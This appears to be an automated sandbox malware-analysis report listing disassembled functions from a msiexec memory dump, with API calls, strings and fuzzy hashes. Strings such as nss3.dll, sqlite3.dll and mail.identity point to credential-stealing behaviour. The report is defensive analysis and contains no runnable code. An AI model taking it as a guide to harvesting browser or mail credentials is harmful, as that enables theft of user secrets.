                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                    APIs
                                                    Strings
                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                    • too many SQL variables, xrefs: 0042C6FD
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                    • API String ID: 2221118986-515162456
                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                    APIs
                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                    • memset.MSVCRT ref: 004026AD
                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                    • String ID:
                                                    • API String ID: 3503910906-0
                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                    APIs
                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                    • strlen.MSVCRT ref: 0040B60B
                                                    • atoi.MSVCRT(?), ref: 0040B619
                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                    • String ID:
                                                    • API String ID: 4107816708-0
                                                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                    • _gmtime64.MSVCRT ref: 00411437
                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                    • strftime.MSVCRT ref: 00411476
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                    • String ID:
                                                    • API String ID: 1886415126-0
                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: strlen
                                                    • String ID: >$>$>
                                                    • API String ID: 39653677-3911187716
                                                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                    APIs
                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: @
                                                    • API String ID: 3510742995-2766056989
                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _strcmpi
                                                    • String ID: C@$mail.identity
                                                    • API String ID: 1439213657-721921413
                                                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                    APIs
                                                    • memset.MSVCRT ref: 00406640
                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset$memcmp
                                                    • String ID: Ul@
                                                    • API String ID: 270934217-715280498
                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                    APIs
                                                      • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                    Strings
                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                    • String ID: recovered %d pages from %s
                                                    • API String ID: 985450955-1623757624
                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _ultoasprintf
                                                    • String ID: %s %s %s
                                                    • API String ID: 432394123-3850900253
                                                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                    APIs
                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                    • sprintf.MSVCRT ref: 0040909B
                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                    • String ID: menu_%d
                                                    • API String ID: 1129539653-2417748251
                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                    APIs
                                                    Strings
                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _msizerealloc
                                                    • String ID: failed memory resize %u to %u bytes
                                                    • API String ID: 2713192863-2134078882
                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                    APIs
                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                    • strrchr.MSVCRT ref: 00409808
                                                    • _mbscat.MSVCRT ref: 0040981D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName_mbscatstrrchr
                                                    • String ID: _lng.ini
                                                    • API String ID: 3334749609-1948609170
                                                    • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                    • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                    APIs
                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                    • _mbscat.MSVCRT ref: 004070FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscat$_mbscpystrlen
                                                    • String ID: sqlite3.dll
                                                    • API String ID: 1983510840-1155512374
                                                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                    APIs
                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileString
                                                    • String ID: A4@$Server Details
                                                    • API String ID: 1096422788-4071850762
                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                    APIs
                                                    • strlen.MSVCRT ref: 0040849A
                                                    • memset.MSVCRT ref: 004084D2
                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,68207B60,?,00000000), ref: 0040858F
                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,68207B60,?,00000000), ref: 004085BA
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                    • String ID:
                                                    • API String ID: 3110682361-0
                                                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID:
                                                    • API String ID: 3510742995-0
                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8